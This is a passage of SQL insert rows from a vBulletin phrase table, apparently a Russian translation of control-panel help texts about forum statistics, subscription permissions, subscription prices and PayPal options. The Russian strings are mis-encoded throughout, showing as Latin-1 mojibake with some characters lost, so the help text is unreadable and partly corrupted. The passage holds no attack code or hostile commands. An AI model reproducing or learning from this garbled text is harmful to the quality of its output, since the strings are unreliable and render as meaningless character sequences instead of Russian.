(23916, -1, 'stats_index_text', 'cphelptext', 'Ññûëêà \"Ñòà òèñòèêà ëó÷øèõ\" ïåðåà äðåñóåò âà ñ Ãà ñòðà Ãèöó, ãäå âû ñìîæåòå ïðîñìîòðåòü ñëåäóþùèå äà ÃÃûå ñòà òèñòèêè: ñà ìûé Ãîâûé ïîëüçîâà òåëü Ãà ôîðóìå, ðåêîðä ïîñåùà åìîñòè ïîëüçîâà òåëåé, ïîëüçîâà òåëü ñ Ãà èáîëüøèì êîëè÷åñòâîì ñîîáùåÃèé Ãà ôîðóìå, ñà ìà ÿ îáñóæäà åìà ÿ òåìà , ñà ìà ÿ ïðîñìà òðèâà åìà ÿ òåìà è ñà ìûé ïîïóëÿðÃûé ðà çäåë. \r\n\r\nÑñûëêè \"Ñòà òèñòèêà ðåãèñòðà öèé\", \"Ñòà òèñòèêà à êòèâÃîñòè ïîëüçîâà òåëåé\", \"Ñòà òèñòèêà Ãîâûõ òåì\" è \"Ñòà òèñòèêà Ãîâûõ ñîîáùåÃèé\" ïåðåà äðåñóþò âà ñ Ãà ñòðà Ãèöû, ãäå âû ñìîæåòå óâèäåòü ñîîòâåòñòâóþùèå ñòà òèñòèêè Ãà îñÃîâå äÃåé, Ãåäåëü èëè ìåñÿöåâ.', 'vbulletin', '', 0, ''),
(23917, -1, 'stats_index_title', 'cphelptext', 'Ñòà òèñòèêà ', 'vbulletin', '', 0, ''),
(23918, -1, 'stats_reg_activity_thread_post_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå âûáðà òü îò÷¸ò î ÃóæÃîé ñòà òèñòèêå. Âûáåðèòå ïåðèîä âðåìåÃè, Ãà êà êèå ïðîìåæóòêè åãî ðà çáèòü è ïîðÿäîê ñîðòèðîâêè. Êîãäà âû ñäåëà åòå âûøåñêà çà ÃÃîå, âû ìîæåòå Ãà æà òü Ãà êÃîïêó \"Âïåð¸ä\", ÷òîáû óâèäåòü ñòà òèñòèêó. Ñìîòðèòå ñîîòâåòñòâóþùèå ðà çäåëû ñïðà âêè, åñëè ó âà ñ åñòü âîïðîñû.', 'vbulletin', '', 0, ''),
(23919, -1, 'stats_reg_activity_thread_post_title', 'cphelptext', 'Ñòà òèñòèêà ', 'vbulletin', '', 0, ''),
(23920, -1, 'stats_reg_activity_thread_post_start_text', 'cphelptext', 'Âûáåðèòå äà òó Ãà ÷à ëà äëÿ ýòîé âûáîðêè. Óêà æèòå ìåñÿö, äåÃü è ãîä. Âûáðà ÃÃà ÿ ñòà òèñòèêà äîëæÃà áûòü ÃÃ¥ ñòà ðøå ýòîé äà òû.', 'vbulletin', '', 0, ''),
(23921, -1, 'stats_reg_activity_thread_post_start_title', 'cphelptext', 'Ãà ÷à ëüÃà ÿ äà òà ', 'vbulletin', '', 0, ''),
(23922, -1, 'stats_reg_activity_thread_post_end_text', 'cphelptext', 'Âûáåðèòå äà òó îêîÃֈ Ãèÿ äëÿ ýòîé âûáîðêè. Óêà æèòå ìåñÿö, äåÃü è ãîä. Âûáðà ÃÃà ÿ ñòà òèñòèêà äîëæÃà áûòü ÃÃ¥ Ãîâåå ýòîé äà òû. Âû ìîæåòå èñïîëüçîâà òü ýòó îïöèþ âìåñòå ñ îïöèåé \"Äà òà Ãà ÷à ëà \", ÷òîáû ñîçäà òü âðåìåÃÃîé ïðîìåæóòîê.', 'vbulletin', '', 0, ''),
(23923, -1, 'stats_reg_activity_thread_post_end_title', 'cphelptext', 'ÊîÃå÷Ãà ÿ äà òà ', 'vbulletin', '', 0, ''),
(23924, -1, 'stats_reg_activity_thread_post_scope_text', 'cphelptext', 'Âûáåðèòå ïðîìåæóòîê âðåìåÃè, â òå÷åÃèè êîòîðîãî âû æåëà åòå ïîëó÷èòü ñòà òèñòèêó. Åñëè âû âûáåðèòå \"åæåäÃåâÃî\", òî ñòà òèñòèêà áóäåò ïî äÃÿì.', 'vbulletin', '', 0, ''),
(23925, -1, 'stats_reg_activity_thread_post_scope_title', 'cphelptext', 'Ãîêà çà òü', 'vbulletin', '', 0, ''),
(23926, -1, 'stats_reg_activity_thread_post_sort_text', 'cphelptext', '\"Âîçðà ñòà þùèé\" ïîðÿäîê îòïðà âèò áîëåå ñòà ðûå äà òû â Ãà ÷à ëî è ñà ìûå Ãîâûå â êîÃåö; äà òû \"âîçðà ñòà þò\" ïî ìåðå ÷òåÃèÿ ñòà òèñòèêè. \"Óáûâà þùèé\" - ýòî òî æå ñà ìîå, Ãî Ãà îáîðîò.', 'vbulletin', '', 0, ''),
(23927, -1, 'stats_reg_activity_thread_post_sort_title', 'cphelptext', 'Ñîðòèðîâêà ïî âðåìåÃè', 'vbulletin', '', 0, ''),
(23928, -1, 'stats_reg_activity_thread_post_nullvalue_text', 'cphelptext', 'Åñëè \"Ãåò\", òî äÃè, Ãåäåëè è ìåñÿöû, â êîòîðûõ ïîèñê ÃÃ¥ äà ñò ðåçóëüòà òîâ, ÃÃ¥ áóäóò îòîáðà æåÃû.', 'vbulletin', '', 0, ''),
(23929, -1, 'stats_reg_activity_thread_post_nullvalue_title', 'cphelptext', 'Ãóñòûå ðåçóëüòà òû', 'vbulletin', '', 0, ''),
(23930, -1, 'stats_top_text', 'cphelptext', 'Ãèæå Ãà õîäèòñÿ ñïèñîê òðèâèà ëüÃûõ ñòà òèñòèê âà øåãî ôîðóìà . Âû ìîæåòå Ãà æà òü Ãà èÃäèâèäóà ëüÃûå ññûëêè â ñòà òèñòèêå, ÷òîáû óâèäåòü ñîîòâåòñòâóþùåãî ïîëüçîâà òåëÿ, òåìó èëè ðà çäåë.', 'vbulletin', '', 0, ''),
(23931, -1, 'stats_top_title', 'cphelptext', 'Ñòà òèñòèêà ëó÷øèõ', 'vbulletin', '', 0, ''),
(23932, -1, 'subscriptionpermission_text', 'cphelptext', 'Ñïðà âî÷Ãûå ñòà òüè: \r\nÃîäïèñêè \r\nÃðà âà ïîäïèñîê \r\n\r\nÃðà âà ïîäïèñîê: \r\nÃî óìîë÷à Ãèþ, ïîëüçîâà òåëè èìåþò ïðà âà Ãà îôîðìëåÃèå ëþáîé äîñòóïÃîé ïîäïèñêè (ñì. Óïðà âëåÃèå ïîäïèñêà ìè ). ÎäÃà êî, âû ìîæåòå çà ïðåòèòü êà êèì-ëèáî ãðóïïà ì ïîëüçîâà òåëåé îôîðìëåÃèå îïðåäåë¸ÃÃîé ïîäïèñêè. Ãîëüçîâà òåëü äîëæåà áûòü ÷ëåÃîì îñÃîâÃîé èëè äîïîëÃèòåëüÃîé ãðóïïû ïîëüçîâà òåëåé, êîòîðîé ðà çðåøåÃà äà ÃÃà ÿ ïîäïèñêà , èÃà ÷å îà ÃÃ¥ ñìîæåò îôîðìèòü å¸.', 'vbulletin', 'zCarot', 1205431035, '3.7.0 Release Candidate 1'),
(23933, -1, 'subscriptionpermission_title', 'cphelptext', 'Î ïðà âà õ ïîäïèñîê', 'vbulletin', 'zCarot', 1146682049, '3.6.0 Beta 1'),
(23934, -1, 'subscriptionpermission_edit_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå çà ïðåòèòü èëè ðà çðåøèòü îôîðìëåÃèå îïðåäåë¸ÃÃûõ ïîäïèñîê îïðåäåë¸ÃÃûì ãðóïïà ì ïîëüçîâà òåëåé. Îïöèè îïèñûâà þòñÿ Ãèæå.', 'vbulletin', 'zCarot', 1151503112, '3.6.0 Beta 4'),
(23935, -1, 'subscriptionpermission_edit_title', 'cphelptext', 'Ãåäà êòèðîâà Ãèå ïðà â ïîäïèñîê', 'vbulletin', 'zCarot', 1146682105, '3.6.0 Beta 1'),
(23936, -1, 'subscriptionpermission_edit_usesub_text', 'cphelptext', 'Ãî óìîë÷à Ãèþ ïîëüçîâà òåëè ìîãóò îôîðìèòü ëþáóþ ïîäïèñêó. Åñëè æå çäåñü âû óñòà Ãîâèòå \"Ãåò\", òî äà ÃÃà ÿ ãðóïïà ïîëüçîâà òåëåé ÃÃ¥ ñìîæåò îôîðìèòü äà ÃÃóþ ïîäïèñêó. ÃîìÃèòå, ÷òî ïîëüçîâà òåëü ìîæåò ÿâëÿòüñÿ ÷ëåÃîì, êà ê îñÃîâÃîé ãðóïïû, òà ê è äîïîëÃèòåëüÃîé. Åñëè ïîäïèñêà ðà çðåøåÃà îäÃîé èç äîïîëÃèòåëüÃîé ãðóïï ïîëüçîâà òåëÿ, òî îà âñ¸ ðà âÃî ñìîæåò îôîðìèòü ïîäïèñêó, äà æå åñëè îñÃîâÃà ÿ ãðóïïà ÃÃ¥ èìååò ïðà âà Ãà ýòî.', 'vbulletin', 'zCarot', 1146682517, '3.6.0 Beta 1'),
(23937, -1, 'subscriptionpermission_edit_usesub_title', 'cphelptext', 'Ìîæåò èñïîëüçîâà òü ïîäïèñêó', 'vbulletin', 'zCarot', 1146682517, '3.6.0 Beta 1'),
(23938, -1, 'subscriptionpermission_modify_text', 'cphelptext', 'Çäåñü âû ìîæåòå çà ïðåòèòü êà êîé-ëèáî ãðóïïå ïîëüçîâà òåëåé îôîðìëÿòü îïðåäåë¸ÃÃóþ ïîäïèñêó. Äëÿ êà æäîé ïîäïèñêè âû óâèäèòå ñïèñîê âñåõ äîñòóïÃûõ ãðóïï ïîëüçîâà òåëåé. Åñëè èìÿ ãðóïïû âûäåëåÃî êðà ñÃûì, òî èì çà ïðåùåÃî îôîðìëÿòü äà ÃÃóþ ïîäïèñêó. Åñëè èìÿ ãðóïïû âûäåëåÃî ÷¸ðÃûì, òî ó Ãèõ åñòü ïðà âî Ãà îôîðìëåÃèå ïîäïèñêè. ×òîáû èçìåÃèòü ïðà âà , Ãà æìèòå \"Ãåäà êòèðîâà òü\" ðÿäîì ñ ãðóïïîé, ïðà âà êîòîðîé Ãà îôîðìëåÃèå äà ÃÃîé ïîäïèñêè âû æåëà åòå èçìåÃèòü.', 'vbulletin', 'zCarot', 1146682613, '3.6.0 Beta 1'),
(23939, -1, 'subscriptionpermission_modify_title', 'cphelptext', 'ÈçìåÃÃ¥Ãèå ïðà â ïîäïèñîê', 'vbulletin', 'zCarot', 1146682613, '3.6.0 Beta 1'),
(23940, -1, 'subscriptions_text', 'cphelptext', 'Ãîäïèñêè: \r\nÓïðà âëåÃèå ïîäïèñêà ìè ôîðóìà èñïîëüçóåòñÿ äëÿ îïëà òû ïîëüçîâà òåëÿìè äîñòóïà ê ôîðóìó. Óáåäèòåñü, ÷òî âû âêëþ÷èëè êà ê ìèÃèìóì îäèà ñïîñîá ïëà òåæåé â óïðà âëåÃèè ñïîñîáà ìè îïëà òû , åñëè âû èñïîëüçóåòå êîììåð÷åñêèå ïîäïèñêè. \r\n\r\nÓïðà âëåÃèå ïîäïèñêà ìè äîñòóïîì ê ôîðóìó ïðîèñõîäèò ñ ïîìîùüþ äîáà âëåÃèÿ è óäà ëåÃèÿ îñÃîâÃûõ è äîïîëÃèòåëüÃûõ ãðóïï ïîëüçîâà òåëåé, à òà êæå óïðà âëåÃèåì ìà ñêà ìè äîñòóïà . Äëÿ ïîÿñÃÃ¥Ãèé ïî ãðóïïà ì ïîëüçîâà òåëåé è ïðà âà ì ôîðóìà ñìîòðèòå ñïðà âî÷Ãûå ñòà òüè â ðà çäåëå \"Ãðóïïû ïîëüçîâà òåëåé\" .', 'vbulletin', 'zCarot', 1209481464, '3.7.1'),
(23941, -1, 'subscriptions_title', 'cphelptext', 'Î ïîäïèñêà õ', 'vbulletin', '', 0, ''),
(23942, -1, 'subscriptions_add_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò âà ì äîáà âèòü Ãîâóþ ïîäïèñêó. Åñëè ó âà ñ åñòü âîïðîñû ïî îïöèÿì Ãèæå, òî èçó÷èòå ñîîòâåòñòâóþùèå ñïðà âî÷Ãûå ñòà òüè. \r\n\r\nÅñëè âû æåëà åòå èñïîëüçîâà òü ýòó ïîäïèñêó äëÿ óïðà âëåÃèÿ ìà ñêà ìè äîñòóïà ïîëüçîâà òåëåé, òî óáåäèòåñü, ÷òî ìà ñêè äîñòóïà âêëþ÷åÃû â âà øèõ îñÃîâÃûõ Ãà ñòðîéêà õ .', 'vbulletin', 'zCarot', 1205430879, '3.7.0 Release Candidate 1'),
(23943, -1, 'subscriptions_add_title', 'cphelptext', 'Äîáà âèòü ïîäïèñêó', 'vbulletin', '', 0, ''),
(23944, -1, 'subscriptions_add_varname_text', 'cphelptext', 'Ãòî èìÿ ïîäïèñêè, èñïîëüçóåìîå âÃóòðè ôîðóìà . ÃŽÃî ìîæåò ñîäåðæà òü òîëüêî ëà òèÃñêèå áóêâû, öèôðû è ñèìâîëû ïîä÷¸ðêèâà Ãèÿ. Ãà ÷èÃà òüñÿ äîëæÃî îáÿçà òåëüÃî ñ áóêâû.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(23945, -1, 'subscriptions_add_varname_title', 'cphelptext', 'Êðà òêîå èìÿ', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(23946, -1, 'subscriptions_add_edit_adminavatar_text', 'cphelptext', 'Ãòà îïöèÿ áóäåò ó÷èòûâà òüñÿ, òîëüêî åñëè ïðè äåéñòâóþùåé ïîäïèñêå ïîëüçîâà òåëþ äà þò ïðà âî èìåòü Ãåñòà Ãäà ðòÃûé à âà òà ð.\r\n\r\nÅñëè ïîëüçîâà òåëü âî âðåìÿ äåéñòâèÿ ïîäïèñêè âûáåðåò Ãåñòà Ãäà ðòÃûé à âà òà ð, òî äà ÃÃà ÿ îïöèÿ îïðåäåëÿåò, ñëåäóåò ëè ñîõðà Ãèòü å¸ ïðè èñòå÷åÃèè ïîäïèñêè, åñëè îáû÷Ãûå ïðà âà ïîëüçîâà òåëÿ ÃÃ¥ ðà çðåøà þò åìó èìåòü Ãåñòà Ãäà ðòÃûé à âà òà ð.', 'vbulletin', 'zCarot', 1144702919, '3.6.0 Beta 1'),
(23947, -1, 'subscriptions_add_edit_adminavatar_title', 'cphelptext', 'Ñîõðà Ãèòü Ãåñòà Ãäà ðòÃûé à âà òà ð', 'vbulletin', 'zCarot', 1144702919, '3.6.0 Beta 1'),
(23948, -1, 'subscriptions_add_edit_adminprofilepic_text', 'cphelptext', 'Ãòà îïöèÿ áóäåò ó÷èòûâà òüñÿ, òîëüêî åñëè ïðè äåéñòâóþùåé ïîäïèñêå ïîëüçîâà òåëþ äà þò ïðà âî èìåòü ôîòîãðà ôèþ.\r\n\r\nÅñëè ïîëüçîâà òåëü âî âðåìÿ äåéñòâèÿ ïîäïèñêè âûáåðåò ôîòîãðà ôèþ, òî äà ÃÃà ÿ îïöèÿ îïðåäåëÿåò, ñëåäóåò ëè ñîõðà Ãèòü å¸ ïðè èñòå÷åÃèè ïîäïèñêè, åñëè îáû÷Ãûå ïðà âà ïîëüçîâà òåëÿ ÃÃ¥ ðà çðåøà þò åìó èìåòü ôîòîãðà ôèþ.', 'vbulletin', 'zCarot', 1205942626, '3.7.0 Release Candidate 1'),
(23949, -1, 'subscriptions_add_edit_adminprofilepic_title', 'cphelptext', 'Ñîõðà Ãèòü ôîòîãðà ôèþ', 'vbulletin', 'zCarot', 1144702948, '3.6.0 Beta 1'),
(23950, -1, 'subscriptions_add_edit_title_text', 'cphelptext', 'Çà ãîëîâîê ïîäïèñêè èñïîëüçóåòñÿ â êà ÷åñòâå èäåÃòèôèêà òîðà äà ÃÃîé ïîäïèñêè Ãà ñòðà Ãèöå Êîììåð÷åñêèå ïîäïèñêè â êà áèÃåòå ïîëüçîâà òåëÿ, à òà êæå â óïðà âëåÃèè ïîäïèñêà ìè â ïà Ãåëè à äìèÃèñòðà òîðà . Çà ãîëîâîê äîëæåà êðà òêî îòðà æà òü ñóòü ïîäïèñêè. Èñïîëüçóéòå ññûëêó \"Ãåðåâîä Ãà äðóãèå ÿçûêè\", ÷òîáû ñäåëà òü çà ãîëîâîê ïîäïèñêè ïîÃÿòÃûì âñåì ïîëüçîâà òåëÿì.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(23951, -1, 'subscriptions_add_edit_title_title', 'cphelptext', 'Çà ãîëîâîê', 'vbulletin', '', 0, ''),
(23952, -1, 'subscriptions_add_edit_description_text', 'cphelptext', 'Ââåäèòå îïèñà Ãèå ýòîé ïîäïèñêè. Îïèñà Ãèå äîëæÃî äà âà òü ïîÃÿòü ïîëüçîâà òåëþ, ÷òî îà ïîëó÷èò, êóïèâ å¸. Îïèñà Ãèå îòîáðà æà åòñÿ Ãà ñòðà Ãèöå Êîììåð÷åñêèå ïîäïèñêè â êà áèÃåòå ïîëüçîâà òåëÿ ïðè ïîêóïêå ïîäïèñîê. Èñïîëüçóéòå ññûëêó \"Ãåðåâîä Ãà äðóãèå ÿçûêè\", ÷òîáû ñäåëà òü îïèñà Ãèå ïîäïèñêè ïîÃÿòÃûì âñåì ïîëüçîâà òåëÿì.', 'vbulletin', 'zCarot', 1142519066, '3.6.0 Beta 1'),
(23953, -1, 'subscriptions_add_edit_description_title', 'cphelptext', 'Îïèñà Ãèå', 'vbulletin', '', 0, ''),
(23954, -1, 'subscriptions_add_edit_active_text', 'cphelptext', 'Îòìåòüòå ýòîò ïóÃêò, åñëè âû æåëà åòå ñäåëà òü ïîäïèñêó äîñòóïÃîé äëÿ ïîëüçîâà òåëåé, ÷òîáû îÃè ñìîãëè ïîäïèñà òüñÿ Ãà Ãå¸. ÀêòèâÃûå ïîäïèñêè äîñòóïÃû Ãà ñòðà Ãèöå Ãëà òÃûå ïîäïèñêè â êà áèÃåòå ïîëüçîâà òåëÿ. Åñëè âû æåëà åòå óäà ëèòü ïîäïèñêó, Ãî ïðåäïîëà ãà åòå èñïîëüçîâà òü å¸ â áóäóùåì, òî âû ìîæåòå ïðîñòî ñÃÿòü îòìåòêó ñ ýòîãî ïóÃêòà äëÿ å¸ îòìåÃû, âìåñòî òîãî, ÷òîáû ïîëÃîñòüþ å¸ óäà ëÿòü.', 'vbulletin', '', 0, ''),
(23955, -1, 'subscriptions_add_edit_active_title', 'cphelptext', 'Âêëþ÷åÃ', 'vbulletin', '', 0, ''),
(23956, -1, 'subscriptions_add_edit_length_text', 'cphelptext', 'Ââåäèòå ÷èñëî â òåêñòîâîå ïîëå è âûáåðèòå ïðîìåæóòîê âðåìåÃè äëÿ óêà çà Ãèÿ ïðîäîëæèòåëüÃîñòè ïîäïèñêè.', 'vbulletin', '', 0, ''),
(23957, -1, 'subscriptions_add_edit_length_title', 'cphelptext', 'Ñðîê ïîäïèñêè', 'vbulletin', '', 0, ''),
(23958, -1, 'subscriptions_add_edit_sub[cost][usd]_text', 'cphelptext', 'Ââåäèòå ñòîèìîñòü ýòîé ïîäïèñêè â äîëëà ðà õ ÑØÀ. Ââåäèòå 0.00, åñëè âû ÃÃ¥ æåëà åòå ïðèÃèìà òü ïëà òåæè â äîëëà ðà õ ÑØÀ Ãà ýòó ïîäïèñêó. \r\n\r\nÅñëè âû æåëà åòå ïîäñ÷èòà òü ýêâèâà ëåÃò äîëëà ðîâ ÑØÀ â äðóãîé âà ëþòå, òî âû ìîæåòå èñïîëüçîâà òü ýòîò ñà éò .', 'vbulletin', '', 0, ''),
(23959, -1, 'subscriptions_add_edit_sub[cost][usd]_title', 'cphelptext', 'Ñòîèìîñòü â äîëëà ðà õ ÑØÀ', 'vbulletin', '', 0, ''),
(23960, -1, 'subscriptions_add_edit_sub[cost][gbp]_text', 'cphelptext', 'Ââåäèòå ñòîèìîñòü ýòîé ïîäïèñêè â ôóÃòà õ ñòåðëèÃãîâ. Ââåäèòå 0.00, åñëè âû ÃÃ¥ æåëà åòå ïðèÃèìà òü ïëà òåæè â ôóÃòà õ ñòåðëèÃãîâ Ãà ýòó ïîäïèñêó. \r\n\r\nÅñëè âû æåëà åòå ïîäñ÷èòà òü ýêâèâà ëåÃò ôóÃòîâ ñòåðëèÃãîâ â äðóãîé âà ëþòå, òî âû ìîæåòå èñïîëüçîâà òü ýòîò ñà éò .', 'vbulletin', '', 0, ''),
(23961, -1, 'subscriptions_add_edit_sub[cost][gbp]_title', 'cphelptext', 'Ñòîèìîñòü â ôóÃòà õ ñòåðëèÃãîâ', 'vbulletin', '', 0, ''),
(23962, -1, 'subscriptions_add_edit_sub[cost][eur]_text', 'cphelptext', 'Ââåäèòå ñòîèìîñòü ýòîé ïîäïèñêè â åâðî. Ââåäèòå 0.00, åñëè âû ÃÃ¥ æåëà åòå ïðèÃèìà òü ïëà òåæè â åâðî Ãà ýòó ïîäïèñêó. \r\n\r\nÅñëè âû æåëà åòå ïîäñ÷èòà òü ýêâèâà ëåÃò åâðî â äðóãîé âà ëþòå, òî âû ìîæåòå èñïîëüçîâà òü ýòîò ñà éò .', 'vbulletin', '', 0, ''),
(23963, -1, 'subscriptions_add_edit_sub[cost][eur]_title', 'cphelptext', 'Ñòîèìîñòü â åâðî', 'vbulletin', '', 0, ''),
(23964, -1, 'subscriptions_add_edit_nusergroupid_text', 'cphelptext', 'Åñëè âû æåëà åòå, ÷òîáû ýòà ïîäïèñêà èçìåÃÿëà îñÃîâÃóþ ãðóïïó ïîëüçîâà òåëåé, òî âûáåðèòå ÃóæÃóþ ãðóïïó ïîëüçîâà òåëåé çäåñü. Âûáåðèòå \"ÃÃ¥ èçìåÃÿòü\", åñëè âû ÃÃ¥ æåëà åòå, ÷òîáû ïîäïèñêà ìåÃÿëà îñÃîâÃóþ ãðóïïó ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(23965, -1, 'subscriptions_add_edit_nusergroupid_title', 'cphelptext', 'ÎñÃîâÃà ÿ ãðóïïà ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(23966, -1, 'subscriptions_add_edit_membergroup_text', 'cphelptext', 'Åñëè âû æåëà åòå, ÷òîáû ýòà ïîäïèñêà äîáà âëÿëà ïîëüçîâà òåëÿ â êà êèå-ëèáî äîïîëÃèòåëüÃûå ãðóïïû ïîëüçîâà òåëåé, òî âû ìîæåòå âûáðà òü èõ çäåñü. Êîãäà ïîëüçîâà òåëü ïîäïèøåòñÿ Ãà ýòó ïîäïèñêó, îà ñðà çó æå áóäåò äîáà âëåà â ýòè äîïîëÃèòåëüÃûå ãðóïïû ïîëüçîâà òåëåé.', 'vbulletin', '', 0, ''),
(23967, -1, 'subscriptions_add_edit_membergroup_title', 'cphelptext', 'ÄîïîëÃèòåëüÃûå ãðóïïû ïîëüçîâà òåëåé', 'vbulletin', '', 0, ''),
(23968, -1, 'subscriptions_add_edit_tax_text', 'cphelptext', 'ÃðèìåÃèìî òîëüêî äëÿ ïëà òåæåé Paypal, åñëè âû âêëþ÷èëè Ãà ëîã ñ ïðîäà æ â Ãà ñòðîéêà õ ïðîäà æ à êêà óÃòà paypal, è ïîêóïà òåëü Ãà õîäèòñÿ â çîÃÃ¥, Ãà êîòîðóþ âû óñòà Ãîâèëè Ãà ëîã. Ãî óìîë÷à Ãèþ, Ãà ëîã ÃÃ¥ áóäåò äîáà âëåà ê ïëà òåæà ì. Âûáåðèòå ýòó îïöèþ, åñëè âû æåëà åòå äîáà âèòü Ãà ëîã.', 'vbulletin', 'zCarot', 1198800926, '3.7.0 Beta 4'),
(23969, -1, 'subscriptions_add_edit_tax_title', 'cphelptext', 'Ãà ëîã ïðîäà æ', 'vbulletin', '', 0, ''),
(23970, -1, 'subscriptions_add_edit_shipping_text', 'cphelptext', 'ÃðèìåÃèìî òîëüêî äëÿ ïëà òåæåé Paypal. Âû ìîæåòå âûáðà òü, äîëæåà áûòü à äðåñ ïëà òåëüùèêà áûòü Ãåîáÿçà òåëüÃûì, îáÿçà òåëüÃûì, èëè îà ÃÃ¥ äîëæåà óêà çûâà òüñÿ.', 'vbulletin', 'zCarot', 1198800913, '3.7.0 Beta 4'),
(23971, -1, 'subscriptions_add_edit_shipping_title', 'cphelptext', 'Àäðåñ îïëà òû', 'vbulletin', '', 0, ''),
(23972, -1, 'subscriptions_add_edit_displayorder_text', 'cphelptext', 'Ãòîò ïà ðà ìåòð îïðåäåëÿåò ïîçèöèþ ïîäïèñêè â ñïèñêå äîñòóïÃûõ ïîäïèñîê.', 'vbulletin', '', 0, ''),
(23973, -1, 'subscriptions_add_edit_displayorder_title', 'cphelptext', 'Ãîðÿäîê îòîáðà æåÃèÿ ïî', 'vbulletin', '', 0, ''),
(23974, -1, 'subscriptions_add_edit_recurring_text', 'cphelptext', 'ÃðèìåÃèìî òîëüêî äëÿ ïëà òåæåé Paypal. Âû ìîæåòå âûáðà òü, ñìîæåò ëè ïëà òåëüùèê âîçâðà òèòü ïëà ò¸æ ïðè îòìåÃÃ¥ ïîäïèñêè. \r\nÃîñëå òîãî êà ê âû âêëþ÷èòå ýòó îïöèþ âû áîëåå ÃÃ¥ ñìîæåòå èçìåÃèòü öåÃó ýòîé ïîäïèñêè, òà ê êà ê öåÃà äëÿ ñóùåñòâóþùèõ ïîëüçîâà òåëåé ÃÃ¥ áóäåò îáÃîâëåÃà . ÎäÃà êî, âû ìîæåòå îòìåÃèòü âñå èõ ïîäïèñêè ÷åðåç èÃòåðôåéñ PayPal è ïðèÃóäèòü èõ ïåðåîôîðìèòü ïîäïèñêó ñÃîâà .', 'vbulletin', 'zCarot', 1200668171, '3.7.0 Beta 4'),
(23975, -1, 'subscriptions_add_edit_recurring_title', 'cphelptext', 'Âîçâðà ò ïëà òåæà ', 'vbulletin', '', 0, ''),
(23976, -1, 'subscriptions_adjust_text', 'cphelptext', 'Ãà ýòîé ñòðà Ãèöå âû ìîæåòå äîáà âèòü/îòðåäà êòèðîâà òü ïîäïèñêó. Åñëè âû ðåäà êòèðóéòå ïîäïèñêó, òî âû ìîæåòå å¸ ñîêðà òèòü, ïðîäëèòü, ñäåëà òü à êòèâÃîé èëè âûêëþ÷åÃÃîé ñ ïîìîùüþ îïöèé Ãèæå. Åñëè âû äîáà âëÿåòå ïîäïèñêó, òî âà ì ñëåäóåò çà ïîëÃèòü ïîëÿ Ãèæå.', 'vbulletin', 'zCarot', 1205942653, '3.7.0 Release Candidate 1'),
(23977, -1, 'subscriptions_adjust_title', 'cphelptext', 'Äîáà âëåÃèå/ðåäà êòèðîâà Ãèå ïîäïèñêè', 'vbulletin', '', 0, ''),
(23978, -1, 'subscriptions_adjust_username_text', 'cphelptext', 'Ââåäèòå ñóùåñòâóþùåå èìÿ ïîëüçîâà òåëÿ, êîìó âû æåëà åòå äîáà âèòü ýòó ïîäïèñêó.', 'vbulletin', '', 0, ''),
(23979, -1, 'subscriptions_adjust_username_title', 'cphelptext', 'Èìÿ', 'vbulletin', '', 0, ''),
(23980, -1, 'subscriptions_adjust_regdate_text', 'cphelptext', 'Ãòà äà òà îçÃà ÷à åò âðåìÿ Ãà ÷à ëà à êòèâÃîñòè ïîäïèñêè. Âûáåðèòå ìåñÿö è ââåäèòå äåÃü, ãîä, ÷à ñ è ìèÃóòó.', 'vbulletin', '', 0, ''),
(23981, -1, 'subscriptions_adjust_regdate_title', 'cphelptext', 'Ãà ÷à ëüÃà ÿ äà òà ', 'vbulletin', '', 0, ''),
(23982, -1, 'subscriptions_adjust_expirydate_text', 'cphelptext', 'Ãòà äà òà îçÃà ÷à åò âðåìÿ, êîãäà äåéñòâèå ïîäïèñêè ïðåêðà òèòñÿ. Âûáåðèòå ìåñÿö è ââåäèòå äåÃü, ãîä, ÷à ñ è ìèÃóòó.', 'vbulletin', '', 0, ''),
(23983, -1, 'subscriptions_adjust_expirydate_title', 'cphelptext', 'Äà òà èñòå÷åÃèÿ', 'vbulletin', '', 0, ''),
(23984, -1, 'subscriptions_adjust_status_text', 'cphelptext', 'Âûáåðèòå \"Äà \", åñëè âû æåëà åòå, ÷òîáû ïîäïèñêà áûëà à êòèâÃîé.  ïðîòèâÃîì ñëó÷à å âûáåðèòå \"Ãåò\".', 'vbulletin', '', 0, ''),
(23985, -1, 'subscriptions_adjust_status_title', 'cphelptext', 'Âêëþ÷åÃ', 'vbulletin', '', 0, ''),
(23986, -1, 'subscriptions_api_text', 'cphelptext', 'Ãòîò ðà çäåë ïîçâîëÿåò âà ì óïðà âëÿòü ñèñòåìà ìè îïëà òû, ê êîòîðûì âû æåëà åòå îáðà ùà òüñÿ äëÿ ïëà òÃûõ ïîäïèñîê ôîðóìà . \r\n\r\nÑèñòåìà îïëà òû - ýòî êîìïà Ãèÿ, ÷åðåç êîòîðóþ ìîæÃî îñóùåñòâëÿòü ðà çÃîîáðà çÃûå ïëà òåæè. Ãà ïðèìåð, åñëè ó âà ñ åñòü ó÷åòÃà ÿ çà ïèñü Paypal è âû âêëþ÷èòå ýòó ñèñòåìó Ãà äà ÃÃîé ñòðà Ãèöå, òî ïîëüçîâà òåëè ñìîãóò èñïîëüçîâà òü Paypal äëÿ îïëà òû ïëà òÃûõ ïîäïèñîê Ãà âà øåì ôîðóìå.', 'vbulletin', 'zCarot', 1198800939, '3.7.0 Beta 4'),
(23987, -1, 'subscriptions_api_title', 'cphelptext', 'Óïðà âëåÃèå ñïîñîáà ìè îïëà òû', 'vbulletin', '', 0, ''),
(23988, -1, 'subscriptions_apiadd_text', 'cphelptext', 'Ãòà ñòðà Ãèöà ïîçâîëÿåò âà ì äîáà âèòü Ãîâûé ñïîñîá îïëà òû. Ãà ðà ìåòðû ñîçäà Ãèÿ îïèñà Ãû Ãèæå.', 'vbulletin', '', 0, ''),
(23989, -1, 'subscriptions_apiadd_title', 'cphelptext', 'Äîáà âëåÃèå ñïîñîáà ', 'vbulletin', '', 0, ''),
